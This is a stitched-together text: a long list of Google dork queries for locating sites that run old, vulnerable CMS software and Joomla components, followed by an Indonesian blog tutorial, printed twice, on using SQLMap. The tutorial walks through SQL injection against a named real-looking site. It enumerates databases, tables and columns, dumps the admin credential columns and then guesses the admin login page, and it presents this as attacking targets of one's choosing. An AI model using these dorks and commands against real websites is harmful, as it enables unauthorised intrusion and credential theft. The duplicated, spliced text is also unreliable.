"""powered by FlatPress"""
"""powered by Gallery v"" ""[slideshow]""|""images"" inurl:gallery"
"""powered by Gradman"""
"""powered by GuppY v4""|""Site créé avec GuppY v4"""
"""powered by ILIAS"""
"""powered by ITWorking"""
"""powered by JAMM"""
"""powered by LionWiki "" "
"""powered by MODx"""
"""powered by Nabernet"" "
"""powered by PCPIN.com"""
"""powered by Pagetool"""
"""powered by PassWiki"""
"""powered by Photo-Graffix Flash Image Gallery"""
"""powered by PhpBB 2.0.15"" -site:phpbb.com"
"""powered by Quick.Cart"""
"""powered by Sitellite"""
"""powered by Sniggabo CMS"" inurl:article.php?id"
"""powered by SnoGrafx"" "
"""powered by TSEP - The Search Engine Project"""
"""powered by ThWboard"""
"""powered by WonderEdit Pro"""
"""powered by XHP CMS"""
"""powered by active php bookmarks"" | inurl:bookmarks/view_group.php?id="
"""powered by aflog"""
"""powered by antiboard"""
"""powered by bitweaver"""
"""powered by blur6ex"""
"""powered by claroline"" -demo"
"""powered by clipshare"""
"""powered by dataface"" ""powered by xataface"" "
"""powered by devalcms v1.4.a"""
"""powered by discuz!"
"""powered by easytrade"""
"""powered by ezUserManager"""
"""powered by fuzzylime"" "
"""powered by gcards"""
"""powered by gelato cms"""
"""powered by guestbook script"" -ihackstuff -exploit"
"""powered by guestbook script"""
"""powered by jaws"" | ""powered by the jaws project"" | inurl:?gadget=search"
"""powered by jmdcms.com"""
"""powered by jshop"" "
"""powered by kure"""
"""powered by mcGalleryPRO"""
"""powered by minibb forum software"""
"""powered by minibb"" -site:www.minibb.net -intext:1.7f"
"""powered by php advanced transfer manager"""
"""powered by php icalendar"" -ihackstuff -exploit"
"""powered by php photo album"" -demo2 -pitanje"""
"""powered by php photo album"" | inurl:""main.php?cmd=album"" -demo2 -pitanje"
"""powered by php update"""
"""powered by phpAdBoard"""
"""powered by phpEmployment"""
"""powered by phpGreetCards"""
"""powered by phplist"" | inurl:""lists/?p=subscribe"" | inurl:""lists/index.php?p=subscribe"" -ubbi -bugs +phplist -tincan.co.uk"
"""powered by phpmydirectory"" OR intext:""2001-2006 phpMyDirectory.com"""
"""powered by pppblog v 0.3.(.)"""
"""powered by real-estate-website"""
"""powered by runcms"" -runcms.com -runcms.org"
"""powered by sX-Shop"" "
"""powered by sazcart"""
"""powered by sblog"" +""version 0.7"""
"""powered by seditio"" OR ""powered by ldu"""
"""powered by shutter v0.1.1"""
"""powered by simpleview CMS"""
"""powered by sphider"" -exploit -ihackstuff -www.cs.ioc.ee"
"""powered by sunshop"""
"""powered by tikiwiki"""
"""powered by twg"""
"""powered by ubbthreads"""
"""powered by vsp stats processor"""
"""powered by webClassifieds"""
"""powered by xmb"""
"""powered by yourtube"""
"""powered by zipbox media"""
"""powered by zomplog"""
"""powered by: WebLeague"" "
"""powered by: elkagroup"" "
"""powered by: profitCode"""
"""powergap"" or ""s04.php"" or s01.php or s02.php"
"""propulsé par JBlog"""
"""propulsé par DotClear"" ""fil atom"" ""fil rss"" +commentaires"
"""qjForum"""
"""realizacja eCreo.eu"""
"""running: Nucleus v3.1"" -.nucleuscms.org -demo"
"""script by RECIPE SCRIPT"""
"""site by Designscope"""
"""site powered by intuitive-websites.com"""
"""sitio web diseñado por http://www.toronja.com.pe"""
"""software 2004-2005 by randshop"""
"""this site is using the webspell script (version: 4.01.02)"""
"""toendaCMS is Free Software released under the GNU/GPL License."" | ""powered by toendaCMS"" -inurl:demo"
"""txx cms"""
"""visiteurs v2.0"""
"""wow roster version 1.*"""
"""wow roster version 1.5.*"""
"""© 2004 PHPKick.de Version 0.8"" "
"""© 2008 DevWorx - devworx.somee.com"" "
"""© 2009 Azimut Technologie"" "
"""© Sabdrimer CMS"""
"""© 2005-2006 Powered by eSyndiCat Link Exchange Script"""
"(""Skin Design by Amie of Intense"")|(""Fanfiction Categories"" ""Featured Stories"")|(""default2, 3column, Romance, eFiction"")"
"(""This Dragonflyâ„¢ installation was"" | ""Thanks for downloading Dragonfly"") -inurl:demo -inurl:cpgnuke.com"
"(""powered by nocc"" intitle:""NOCC Webmail"") -site:sourceforge.net -Zoekinalles.nl -analysis"
"(intitle:""Flyspray setup""|""powered by flyspray 0.9.7"") -flyspray.rocks.cc"
"(intitle:""metaframe XP Login"")|(intitle:""metaframe Presentation server Login"")"
"+""Powered by Invision Power Board v2.0.0..2"""
"+""Powered by phpBB 2.0.6..10"" -phpbb.com -phpbb.pl"
"+intext:""powered by MyBulletinBoard"""
"724CMS Powered, 724CMS Version 4.59. Enterprise "
"AlstraSoft Web ""ESE"""
"Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -""deadly eyes"""
"Copyright 2007, PHPAUCTION.NET"
"Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005"
"FhImage, powered by Flash-here.com"
"Nwahy.com 2.1 , inurl:'add-site.html'"
"Powered by ""vcart 3.3.2"""
"Powered by Ac4p.com Gallery v1.0 , Copyright© 2007 ac4p.com"
"Powered by Discuz! 1.0 © 2002, Crossday Studio of 11cn.org"
"Powered by Dodo, Bubo & Misty. Feed us!"
"This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004."
"This site is powered by e107, which is released under the terms of the GNU GPL License."
"[ Copyright 2005-2006 phpDirectorySourceâ„¢, all rights reserved ]"
"allintext: ""This site is powered by IndexScript"""
"allintext:"" If you would like to contact us, our email address is"" traffic"
"allintext:""Browse Blogs by Category"""
"allintext:""Browse our directory of our members top sites or create your own for free!"""
"allintext:""Home Member Search Chat Room Forum Help/Support privacy policy"""
"allintext:""Latest Pictures"" Name Gender Profile Rating"
"allintext:""Powered By Buddy Zone"""
"allintext:""Powered by: TotalCalendar"""
"allintext:""SuperCali Event Calendar"""
"allintitle: ""MCgallery 0.5b"""
"allinurl :""/modules/tutorials/"""
"allinurl :""modules/eblog"""
"allinurl :""modules/gallery"""
"allinurl :""modules/recipe"""
"allinurl :""wp-content/plugins/st_newsletter"""
"allinurl: ""/modules/myTopics/"""
"allinurl: ""com_actualite"""
"allinurl: ""com_alberghi"" detail"
"allinurl: ""com_estateagent"""
"allinurl: ""com_galeria"""
"allinurl: ""com_glossary"""
"allinurl: ""com_joovideo"" detail"
"allinurl: ""com_rapidrecipe""user_id"
"allinurl: ""index php p shop""categ"
"allinurl: ""index.php?area""galid"
"allinurl: ""index.php?mod=galerie""action=gal"
"allinurl: ""index.php?option=com_doc"""
"allinurl: ""index.php?p=gallerypic img_id"""
"allinurl: ""index.php?p=poll""showresult"
"allinurl: ""index.php?showlink""links"
"allinurl: ""modules MyAnnonces index php pa view"""
"allinurl: ""modules/dictionary"""
"allinurl: ""modules/dictionary/detail.php?id"" "
"allinurl: ""modules/eEmpregos/index.php"""
"allinurl: ""modules/glossaires"""
"allinurl: ""modules/wfdownloads/viewcat.php?cid"""
"allinurl: ""name Sections op viewarticle artid"""
"allinurl: ""pollBooth.php?op=results""pollID"
"allinurl: ""showCat.php?cat_id"""
"allinurl: ""wordspew-rss.php"""
"allinurl: aid ""com_xfaq"""
"allinurl: cid""modules/classifieds/index.php?pa=Adsview"""
"allinurl: com_gallery ""func"""
"allinurl: com_mcquiz ""tid"""
"allinurl: com_paxxgallery ""userid"" "
"allinurl: com_pcchess ""user_id"""
"allinurl: com_quiz""tid"""
"allinurl: galid ""index.php?p=gallerypic"""
"allinurl: id ""com_jooget"""
"allinurl: modules-php-op-modload ""req view_cat"""
"allinurl: page_id album ""photo"""
"allinurl:""/lildbi/"" "
"allinurl:""/questcms/"""
"allinurl:""/ubbthreads/"""
"allinurl:""article.download.php"""
"allinurl:""channel_detail.php?chid="""
"allinurl:""com_accombo"""
"allinurl:""com_ahsshop""do=default"
"allinurl:""com_candle"""
"allinurl:""com_cinema"""
"allinurl:""com_extcalendar"""
"allinurl:""com_garyscookbook"""
"allinurl:""com_n-gallery"""
"allinurl:""com_na_content"""
"allinurl:""com_neogallery"""
"allinurl:""com_restaurante"""
"allinurl:""com_simpleshop"""
"allinurl:""detResolucion.php?tipodoc_id="""
"allinurl:""index.php?mod=archives"""
"allinurl:""index.php?site="" ""W-Agora"""
"allinurl:""jokes.php?catagorie="""
"allinurl:""lyrics_menu/lyrics_song.php?l_id="""
"allinurl:""macgurublog.php?uid="""
"allinurl:""members.asp?action"""
"allinurl:""modules/photo/viewcat.php?id"""
"allinurl:""shop.htm?shopMGID="""
"allinurl:""verliadmin"""
"allinurl:""xGb.php"""
"allinurl:clientsignup.php ""classifieds"""
"allinurl:flashblog.html ""flashblog"""
"anyInventory, the most flexible and powerful web-based inventory system"
"ext:php intext:""Powered by phpNewMan Version"""
"ext:pl inurl:cgi intitle:""FormMail *"" -""*Referrer"" -""* Denied"" -sourceforge -error -cvs -input"
"filetype:asp inurl:""shopdisplayproducts.asp"""
"filetype:php intitle:""paNews v2.0b4"""
"filetype:php inurl:index.php inurl:""module=subjects"" inurl:""func=*"" (listpages| viewpage | listcat)"
"http://www.google.com/search?q=""Powered+by+XMB"""
"intext : ""Website by conceptinternetltd"""
"intext: ""Powered by Marinet"" "
"intext: ""Site developed & mantained by Woodall Creative Group"" "
"intext:"" Website Design and Hosting By Netricks, Inc."""
"intext:""2000-2001 The phpHeaven Team"" -sourceforge"
"intext:""2000-2001 The phpHeaven Team"""
"intext:""Calendar Program © Copyright 1999 Matt Kruse"" ""Add an event"""
"intext:""Design by BB Media.Org"" "
"intext:""Design by BB Media.Org"""
"intext:""Design by MMA Creative"" "
"intext:""Designed by Spaceacre"" "
"intext:""English for dummies"""
"intext:""Event List 0.8 Alpha by schlu.net """
"intext:""Free Ecommerce Shopping Cart Software by ViArt"" +""Your shopping cart is empty!"" + ""Products Search"" +""Advanced Search"" + ""All Categories"""
"intext:""Kalimat news system v 1.0"" "
"intext:""LinPHA Version"" intext:""Have fun"""
"intext:""Marketing Web Design - Posicionamiento en Buscadores"" "
"intext:""Parlic Design"" inurl:id "
"intext:""PhpGedView Version"" intext:""final - index"" -inurl:demo"
"intext:""Powered By : Yamamah Version 1.00"" "
"intext:""Powered By Azaronline.com"" "
"intext:""Powered By Geeklog"" -geeklog.net"
Tutorial SQLMap And Find Page Admin :D
kali ini KTKArmy-Blog mau share tutorial SQLMap + Cari page adminnya
Lets begin !
Alat :
- Python
- SQLMap
- Pemahaman :3
Requirement :
- Windows
- Backtrack
How To :
1. Cari dulu target / web yang mau dipepes :3
2. Kalo udah ketemu, masukin folder SQLMap di tempat yg gampang aksesnya (biar ga ribet)...
Contoh :
Windows :
masukin folder SQLMap ke C:\Python27\tools\
(biar gampang bukanya :3)
nanti tinggal :
cd Python27
cd tools
cd sqlmap
beres :3
untuk Backtrack :
ch0c0@r00t :~$ cd /pentest/database/sqlmap/
3. kalo udah, tinggal kita coba scan target yang vuln =))
contoh : http://snakedancecondos.com/pages.php?id=10
lalu scan pake command :
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 --dbs --random-agent --flush-session
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 --dbs --random-agent --flush-session
*Ket :
-u : url address yang vulnerable
--dbs : mencari database dari target vuln
--random-agent : menggunakan user agent secara acak
--flush-session : menggunakan tehnik injeksi lain jika target ga vulnerable pake injeksi biasa
hasilnya, ketemu dibawah sendiri :3
Database :
- xxxxxxxxxxx
- information_schema
4. kalo udah ketemu, tinggal kita cari tablenya
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxx --tables --time-sec=5 --random-agent
Backtrack :
.sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --tables --random-agent --time-sec=5
**ket :
-D : menggunakan database yang ditemukan sebagai titik scanner
--tables : mencari data table yang ada pada database (-D)
--time-sec=5 : menentukan timing scanner dari sqlmap (5 aja defaultnya kalo mau diganti bisa diganti )
dan hasilnya juga ketemu dibawah sendiri :3
Table Found :
-------------------------------
-------------------------------
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
-------------------------------
-------------------------------
5. Nahh, kalo udah kaya gini tinggal scan column aja
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --columns --random-agent
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --columns --random-agent
**Ket :
-T : table yang digunakan untuk titik scanning
--columns : mencari data columns yang terdapat pada data table
nahh, nanti munculnya kaya begini :
Columns Found :
-------------------------------
-------------------------------
--- -xxxxxxx_admin ---
--- -xxxxxxx_password ---
--- -xxxxxxx_id ---
--- -xxxxxxx ---
-------------------------------
-------------------------------
6. Kalo udah, kita tinggal dump columnnya aja :V
xixixiixixiii....
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx -C xxxxxx --dump --random-agent --time-sec=5
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx -C xxxxxx_admin --dump --random-agent --time-sec=5
**Ket :
-C xxxxxx_admin : Mencari isi data dari column yang terdapat pada column xxxxxx_admin
--dump : menampilkan hasil dari data column.
**Note :
waktu nyecan, bila muncul pertanyaan, antara suruh milih angka 1 atau 2...
pilih aja angka 1, karena kalo milih angka 2, akan melakukan dump pada semua column ( butuh waktu lama :3 )
dan, munculnya :
-------------------------------
-------------------------------
--- ---
--- -xxxxxxx_admin ---
-------------------------------
-------------------------------
yah begitulah
sama cara untuk mencari data column yang lainnya :3
++ Cara Mencari Admin Page SQL Injection ++
ini cara yang paling penting :3
kalo udah dapet username + password admin, tinggal scan page adminnya, caranya :
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --search --random-agent
atau :
sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --search -C xxxxx_admin --random-agent
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --search --random-agent
atau :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --search -C xxxxx_admin --random-agent
**Ket :
--search : mencari sebuah data, antara table dan column (terserah penempatan mau ditaruh diantara -T*tables* atau -C*columns*) karena fungsi utama --search adalah mencari data tertentu dari tables atau column :3
Cara ke 2 : Mencari admin dengan Logika
cara ini emang lumayan ampuh :3
untuk mencari page/halaman admin
Logika :
kalo username yang ketemu : admin
maka kalo dicoba, pasti akan sama dengan halaman admin..
contoh :
user : admin
pass : admin123
maka halaman loginnya : http://snakedancecondos.com/admin
dan voila, pasti ketemu :3
Logikanya, mencari page/halaman admin itu susah2 gampang :3
penting, kita bisa mengkreasikan tehnik tersebut
Sekian dari ane, KTKArmy-Blog ...
maaf kalo artikelnya panjang
soalnya biar kita ngerti, dasar2nya dalam penggunaannya dan gampang untuk mengkreasikan penggunaanya jadi lebih ampuh
ga asal pake :3
hihih
Lets begin !
Alat :
- Python
- SQLMap
- Pemahaman :3
Requirement :
- Windows
- Backtrack
How To :
1. Cari dulu target / web yang mau dipepes :3
2. Kalo udah ketemu, masukin folder SQLMap di tempat yg gampang aksesnya (biar ga ribet)...
Contoh :
Windows :
masukin folder SQLMap ke C:\Python27\tools\
(biar gampang bukanya :3)
nanti tinggal :
cd Python27
cd tools
cd sqlmap
beres :3
untuk Backtrack :
ch0c0@r00t :~$ cd /pentest/database/sqlmap/
3. kalo udah, tinggal kita coba scan target yang vuln =))
contoh : http://snakedancecondos.com/pages.php?id=10
lalu scan pake command :
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 --dbs --random-agent --flush-session
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 --dbs --random-agent --flush-session
*Ket :
-u : url address yang vulnerable
--dbs : mencari database dari target vuln
--random-agent : menggunakan user agent secara acak
--flush-session : menggunakan tehnik injeksi lain jika target ga vulnerable pake injeksi biasa
hasilnya, ketemu dibawah sendiri :3
Database :
- xxxxxxxxxxx
- information_schema
4. kalo udah ketemu, tinggal kita cari tablenya
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxx --tables --time-sec=5 --random-agent
Backtrack :
.sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --tables --random-agent --time-sec=5
**ket :
-D : menggunakan database yang ditemukan sebagai titik scanner
--tables : mencari data table yang ada pada database (-D)
--time-sec=5 : menentukan timing scanner dari sqlmap (5 aja defaultnya kalo mau diganti bisa diganti )
dan hasilnya juga ketemu dibawah sendiri :3
Table Found :
-------------------------------
-------------------------------
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
-------------------------------
-------------------------------
5. Nahh, kalo udah kaya gini tinggal scan column aja
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --columns --random-agent
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --columns --random-agent
**Ket :
-T : table yang digunakan untuk titik scanning
--columns : mencari data columns yang terdapat pada data table
nahh, nanti munculnya kaya begini :
Columns Found :
-------------------------------
-------------------------------
--- -xxxxxxx_admin ---
--- -xxxxxxx_password ---
--- -xxxxxxx_id ---
--- -xxxxxxx ---
-------------------------------
-------------------------------
6. Kalo udah, kita tinggal dump columnnya aja :V
xixixiixixiii....
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx -C xxxxxx --dump --random-agent --time-sec=5
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx -C xxxxxx_admin --dump --random-agent --time-sec=5
**Ket :
-C xxxxxx_admin : Mencari isi data dari column yang terdapat pada column xxxxxx_admin
--dump : menampilkan hasil dari data column.
**Note :
waktu nyecan, bila muncul pertanyaan, antara suruh milih angka 1 atau 2...
pilih aja angka 1, karena kalo milih angka 2, akan melakukan dump pada semua column ( butuh waktu lama :3 )
dan, munculnya :
-------------------------------
-------------------------------
--- ---
--- -xxxxxxx_admin ---
-------------------------------
-------------------------------
yah begitulah
sama cara untuk mencari data column yang lainnya :3
++ Cara Mencari Admin Page SQL Injection ++
ini cara yang paling penting :3
kalo udah dapet username + password admin, tinggal scan page adminnya, caranya :
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --search --random-agent
atau :
sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --search -C xxxxx_admin --random-agent
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --search --random-agent
atau :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --search -C xxxxx_admin --random-agent
**Ket :
--search : mencari sebuah data, antara table dan column (terserah penempatan mau ditaruh diantara -T*tables* atau -C*columns*) karena fungsi utama --search adalah mencari data tertentu dari tables atau column :3
Cara ke 2 : Mencari admin dengan Logika
cara ini emang lumayan ampuh :3
untuk mencari page/halaman admin
Logika :
kalo username yang ketemu : admin
maka kalo dicoba, pasti akan sama dengan halaman admin..
contoh :
user : admin
pass : admin123
maka halaman loginnya : http://snakedancecondos.com/admin
dan voila, pasti ketemu :3
Logikanya, mencari page/halaman admin itu susah2 gampang :3
penting, kita bisa mengkreasikan tehnik tersebut
Sekian dari ane, KTKArmy-Blog ...
maaf kalo artikelnya panjang
soalnya biar kita ngerti, dasar2nya dalam penggunaannya dan gampang untuk mengkreasikan penggunaanya jadi lebih ampuh
ga asal pake :3
hihih
Langganan:
Postingan (Atom)